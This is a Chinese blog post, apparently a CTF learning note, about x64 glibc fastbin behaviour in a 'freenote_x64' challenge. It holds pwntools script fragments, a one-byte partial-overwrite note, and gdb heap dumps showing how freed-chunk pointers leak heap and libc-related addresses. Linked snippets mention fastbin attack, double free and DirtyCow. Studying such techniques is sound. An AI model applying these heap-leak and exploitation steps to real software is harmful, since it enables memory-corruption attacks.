x64 fastbin2

最新推荐文章于 2021-11-29 10:27:16 发布
最新推荐文章于 2021-11-29 10:27:16 发布
阅读量230 收藏
点赞数
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bme314/article/details/78984694
版权 

p=gdb.debug('./freenote_x64','''b *0x400caa
c
x/50x $rax
c
c
c
x/100x $rax-0x50
''')
notelen=0x10

new_note("A"*notelen)
new_note("B"*notelen)
new_note("C"*notelen)
new_note("D"*notelen)
delete_note(2)
delete_note(0)

new_note("AAAAAAAA")

list_note()
p.recvuntil("0. ")
0xa6f830:   0x41414141  0x41414141  0x41414141  0x41414141
0xa6f840:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f850:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f860:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f870:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f880:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f890:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f8a0:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f8b0:   0x00000000  0x00000000  0x00000091  0x00000000
0xa6f8c0:   0x42424242  0x42424242  0x42424242  0x42424242
0xa6f8d0:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f8e0:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f8f0:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f900:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f910:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f920:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f930:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f940:   0x00000000  0x00000000  0x00000091  0x00000000
0xa6f950:   0x43434343  0x43434343  0x43434343  0x43434343
0xa6f960:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f970:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f980:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f990:   0x00000000  0x00000000  0x00000000  0x00000000
---Type <return> to continue, or q <return> to quit---
0xa6f9a0:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f9b0:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f9c0:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f9d0:   0x00000000  0x00000000  0x00000091  0x00000000
0xa6f9e0:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6f9f0:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6fa00:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6fa10:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6fa20:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6fa30:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6fa40:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6fa50:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6fa60:   0x00000000  0x00000000  0x000205a1  0x00000000
0xa6fa70:   0x00000000  0x00000000  0x00000000  0x00000000
0xa6fa80:   0x00000000  0x00000000

0x20cc830:  0xbcbfc678  0x00007fec  0xbcbfc678  0x00007fec
0x20cc840:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc850:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc860:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc870:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc880:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc890:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc8a0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc8b0:  0x00000090  0x00000000  0x00000090  0x00000000
0x20cc8c0:  0x42424242  0x42424242  0x42424242  0x42424242
0x20cc8d0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc8e0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc8f0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc900:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc910:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc920:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc930:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc940:  0x00000000  0x00000000  0x00000091  0x00000000
0x20cc950:  0xbcbfc678  0x00007fec  0x020cc820  0x00000000   <-----要想溢出这个值,就必须重新分配这个地址。这个地址是先释放的。所以说应该是先进先出的原则。
0x20cc960:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc970:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc980:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc990:  0x00000000  0x00000000  0x00000000  0x00000000
---Type <return> to continue, or q <return> to quit---
0x20cc9a0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc9b0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc9c0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cc9d0:  0x00000090  0x00000000  0x00000091  0x00000000
0x20cc9e0:  0x44444444  0x44444444  0x44444444  0x44444444
0x20cc9f0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cca00:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cca10:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cca20:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cca30:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cca40:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cca50:  0x00000000  0x00000000  0x00000000  0x00000000
0x20cca60:  0x00000000  0x00000000  0x000205a1  0x00000000

(gdb) x/150x 0x2002830
0x2002830:  0xfbd70678  0x00007f8a  0xfbd70678  0x00007f8a
0x2002840:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002850:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002860:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002870:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002880:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002890:  0x00000000  0x00000000  0x00000000  0x00000000
0x20028a0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20028b0:  0x00000090  0x00000000  0x00000091  0x00000000
0x20028c0:  0x42424242  0x42424242  0x42424242  0x42424242
0x20028d0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20028e0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20028f0:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002900:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002910:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002920:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002930:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002940:  0x00000000  0x00000000  0x00000091  0x00000000
0x2002950:  0x41414141  0x41414141  0x02002820  0x00000000<----折辱我们猜想的,这个先释放的会先分配,然后被A占用,输出这个字符串就可以溢出我们的堆地址。因为我们第二个释放的是堆块1,所以这里指向的的地址也就是堆块1.
0x2002960:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002970:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002980:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002990:  0x00000000  0x00000000  0x00000000  0x00000000
---Type <return> to continue, or q <return> to quit---
0x20029a0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20029b0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20029c0:  0x00000000  0x00000000  0x00000000  0x00000000
0x20029d0:  0x00000090  0x00000000  0x00000091  0x00000000
0x20029e0:  0x44444444  0x44444444  0x44444444  0x44444444
0x20029f0:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002a00:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002a10:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002a20:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002a30:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002a40:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002a50:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002a60:  0x00000000  0x00000000  0x000205a1  0x00000000
0x2002a70:  0x00000000  0x00000000  0x00000000  0x00000000
0x2002a80:  0x00000000  0x00000000

notelen=0x80
#io.sendline("c")
p=gdb.debug('./freenote_x64','''b *0x400caa
c
x/50x $rax
c
c
b *0x400d85
c
x/50x $rax
''')
new_note("A"*notelen)

new_note("B"*notelen)
delete_note(0)

new_note("\xb8")
(gdb) x/100x 0x20a1830
0x20a1830:  0xab4086b8  0x00007f17  0xab408678  0x00007f17
0x20a1840:  0x41414141  0x41414141  0x41414141  0x41414141
0x20a1850:  0x41414141  0x41414141  0x41414141  0x41414141
0x20a1860:  0x41414141  0x41414141  0x41414141  0x41414141
0x20a1870:  0x41414141  0x41414141  0x41414141  0x41414141
0x20a1880:  0x41414141  0x41414141  0x41414141  0x41414141
0x20a1890:  0x41414141  0x41414141  0x41414141  0x41414141
0x20a18a0:  0x41414141  0x41414141  0x41414141  0x41414141
0x20a18b0:  0x00000090  0x00000000  0x00000091  0x00000000
0x20a18c0:  0x42424242  0x42424242  0x42424242  0x42424242
0x20a18d0:  0x42424242  0x42424242  0x42424242  0x42424242
0x20a18e0:  0x42424242  0x42424242  0x42424242  0x42424242
0x20a18f0:  0x42424242  0x42424242  0x42424242  0x42424242
0x20a1900:  0x42424242  0x42424242  0x42424242  0x42424242
0x20a1910:  0x42424242  0x42424242  0x42424242  0x42424242
0x20a1920:  0x42424242  0x42424242  0x42424242  0x42424242
0x20a1930:  0x42424242  0x42424242  0x42424242  0x42424242
0x20a1940:  0x00000000  0x00000000  0x000206c1  0x00000000

经过对比,fastbin链表结构好像不止单链表这么简单。
这里写图片描述

我查了些资料图中p指向的地址明显是个很重要的地址,但根本没说明这个指针指向那。我通过分析发现,这个地址虽然不是libc地址,但跟libc地址相关。而且每个块释放后链接到链表后都会有个p指针,最前面的块因为没有前向指针fd,所以两个指针地址都是这里的p指针。

inquisiter
关注
专栏目录
在pwn题中fastbin的利用
Vicl1fe的博客
09-28 672
参考和题目链接链接:https://paper.seebug.org/445/#pwnfastbin 前言 这个题,我搞了有一天,没搞出来,就在我快放弃的时候,才终于解出来,可能系统不一样,我覆盖不了参考文章的地址,最后我覆盖了别的地址。具体来看看吧。 ...
fastbin attack + unsorted bin attack+ heap overflow+ double free fastbin + double free unlink
qq_39869547的博客
10-27 386
0x1 fastbin依靠单链表来组织的,堆管理结构始终维护一个指向最后一个chunk的指针(倒数第二个chunk的fd,通常情况这个fd指向的是下一个chunk起始地址)。这个指针决定了下一次要分配的chunk地址。 也就是说默认分配最好一个chunk给用户使用,同时最后一个chunk也是我们一开始第一个free掉的 0x2 我们的目的修改某一个chunk的fd ,这样我们就可以任意地址分配我们...
x64 fastbin
inquisiter
01-02 363
#undef _FORTIFY_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h>int BufForTst[100];int main(int argc, char *argv[]) { void *buf0,*buf1,*buf2,*buf3; BufForTst[1]=0x29; buf0
fastbin3x64
inquisiter
01-06 211
notelen = 0x80#new_note("/bin/sh\x00"+"A"*(notelen-8)) new_note("A"*notelen) new_note("B"*notelen) new_note("C"*notelen) delete_note(2) delete_note(1) delete_note(0)fd = 0x11111111 #notetable bk = f
Linux 堆溢出之fastbin实例
M021的专栏
11-11 3993
Linux下堆溢出 fastbin实例
堆漏洞挖掘中的bins分类(fastbin、unsorted bin、small bin、large bin)
热门推荐
董哥的黑板报
07-23 1万+
一、bin链的介绍 bin是一个由struct chunk结构体组成的链表 前面介绍过,不同的chunk根据特点不同分为不同的chunk,为了将这些chunk进行分类的管理,glibc采用了bin链这种方式管理不同的chunk 不同的bin链是由arena管理的 bin链中的chunk均为free chunk 二、bin链分类 根据bin链成员的大小不同,分为以下几类: fast bi...
pwn学习-how2heap-fastbin_dup
qq_39153247的博客
08-20 1486
今天打完比赛身心疲惫,来复习复习把,写一点简单的把   之所以记录一下fastbin,是因为现阶段我能接触到最多的就是它了。   fastbins: 程序中总是会分配一些比较小的堆块,对于这些堆块来说,如果我们直接将他们合并,那么下次申请的时候还需要重新切割出来,降低了运行的效率,所以ptmalloc设计了fastbins. fastbins共有10个bin,分别是8-80字节,依次增...
从两道基础题简单认识和了解fastbin double free漏洞的利用
weixin_44864859的博客
07-13 1041
fastbin double free原理 Fastbin Double Free 是指 fastbin 的 chunk 可以被多次释放,因此可以在 fastbin 链表中存在多次。这样导致的后果是多次分配可以从 fastbin 链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆 (type confused) 的效果。(即可以构造假的chunk实现任意地址写) Fastbin Double Free 能够成功利用主要有两部分的原因 fastbin 的堆块被释放后
pwn 堆入门之fastbin attack
清霂的博客
04-02 333
目录floworeo b站原本有一个对堆基础讲的挺好的,好像叫pwn术进阶的堆溢出,但刚刚去看已经没了,好家伙,还好我刚看完,哈哈哈。 flow 涅普计划-ctf入门课堆溢出 #!/usr/bin/env python2 from pwn import * context(os="linux", arch="amd64", log_level="debug") #libc libc=ELF("libc.so.6") malloc_libc=libc.symbols['__malloc_hook'] m
堆机制利用之fastbin
weixin_48066554的博客
05-04 2352
堆机制利用之fastbin 前半部分:基于libc2.23(无tcache) 堆机制(fastbin等) 想要了解堆的机制利用方法必须要先了解堆的基本机制以及结构 目前主要使用的内存管理库是ptmalloc,而在ptmalloc中,用户请求的空间由名为chunk的数据结构表示 下面就是一个标准的chunk结构 该chunk中,**prev_size参数为前一chunk(如果未被使用)的大小,size参数为该chunk的大小,而P参数(pre_insue)为标志位,标志前一个chunk的使用情况。**而上述
pwn工具箱之fastbin attack
jmp esp
05-22 2251
fastbin attack基本信息 利用类型: 堆利用 堆利用类型: 针对fastbin的利用 利用思想: 利用fastbin的free只检查是否和上一个freechunk相等,使得同一个chunk两次进入free list,造成UAF,可以更改fastbin free chunk的fd信息,最终分配一个特定地址 利用难点 需要能够两次free同一个chunk 更改fd的时候,为了能够在之后的ma
PWN入门笔记 FastBinAttack+HouseOfSpirit+UnsortedBinLeak
cossack9989的博客
05-24 1527
好久没发文章了,从3月到5月所有学习记录全都存档在gitee上,包括本篇所有相关题目的exp,链接在此~ 接下来想讲一讲自己对FastBinAttack和HouseOfSpirit以及UnsortedBinLeak的认识,因为我发现这俩攻击方法和这一种泄露方法最近用的贼多(也很好用),与其说是Pwn Heap,不如说是Pwn Linked-List(手动狗头) FastBinAttack P...
USB设备管理过程
inquisiter
11-29 3613
驱动关于usb整体流程 时序图: drive device 分别attach到bus总线上,probe用来使drive驱动device 可以看到,attach后的device会找到对应的drive,并调用相应的probe函数。 关键数据结构 代码基于 内核5.11 这里以usb设备为代表,但其他总线设备道理类似。 device_attach函数中会有一个查找对应驱动的函数,算法大致是遍历总线,然后对device 和 drive对应的数据结构进行对比。 通知用户态 为了实时的通知用户态内核的设备管理
dwarf 栈解析格式小结
inquisiter
08-04 3257
eh_frame 所有的dwarf都在eh_frame的节当中,具体格式如下: 一般一个cie对应多个fde,一个fde对应相应函数的寄存器恢复信息,不仅仅是栈信息。 当我们拿到eh_frame后,就需要解析cie和fde. (http://dwarfstd.org/doc/DWARF4.pdf) 官方文档有很详细的东西,不适合入门感觉。根据结尾的例子来分别讲解cie和fde. common information entry encoding cie : common information entr
强大的硬件虚拟化
inquisiter
10-29 3243
一、vt核心vmcs 前几篇介绍了vt强大的无察觉劫持页表hook的能力,kvm的大致原理,但vt的能力远远不止于此。因为实现vt托管的操作系统,将可以做到指令级的管控。甚至直接基于vt形成调试器,如果用来调试内核,将会将会大大提高稳定性。整个vt核心全部位于vmcs的 状态域。根据intel 开发手册第三卷,控制域的核心部分分为1.guest field ,.2 host field , 3.vm-excution control field, 4.vm-Exit control field, 5.vm
arm64 内核 inline hook
inquisiter
02-17 2058
linux 内核对于安全可能是比较重要的一环。 关于syscall table 表替换的问题 这里以linux 4.15和4.19为代表的说明我遇到的问题。 syscall hook 4.15 4.19 拥有可读写状态 hook成功 hook失败 这里似乎到4.19添加了对systable的保护。 如果非要对systable进行hook,可能替换这页表,改变物理地址指向是一种解...
linux内核内存读写属性更改的问题
inquisiter
03-03 2053
在arm体系下,内核在较早版本的读写没有开启,至少在4.4版本之前。但是在4.19之后的内核,默认开启。 这里有个set_mem_rw(unsigned long ,int) 在19版本上理论上可以更改内存的读写属性,但是采取 set_mem_rw = (void *)kallsyms_lookup_name("set_memory_rw"); 进行导出引用,发现根本不管用。我还以为这里内核写的...
DirtyCow Linux权限提升漏洞分析
inquisiter
03-09 2055
DirtyCow Linux权限提升漏洞分析 如上图,这个漏洞的特点就是线程竞争导致可以读写的权限被扩大了。其实具体说可能有点绕,就是foll_write标志在row特性执行后去掉了,但是再次执行时却没有检查页表项的有效性,导致我们可以利用另一个线程清空页表。清空的页表由于没有了foll_write权限要求,再次被分配时就不执行row执行机制,导致原本不应该本写的地址拥有了写的权限。 ...
FASTBIN CONSOLIDATION THRESHOLD, fastbin 中的chunk一般不会与其他chunk合并。但如果合并之后的chunk大于FASTBIN_CONSOLIDATION THRESHOLD ,就 会 触 发malloc consolidate()函数,将fastbin 中的 chunk 与其他 freechunk合并,然后移动到unsorted bin中。 #define FASTBIN CONSOLIDATION THRESHOLD (65536UL)
最新发布
07-20
这段代码是关于 fastbin 中的 chunk 合并的宏定义。 1. `FASTBIN_CONSOLIDATION_THRESHOLD` 宏定义表示 fastbin 中的 chunk 不会自动与其他 chunk 合并,除非合并后的大小超过了该阈值。该阈值的值为 65536UL,即 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值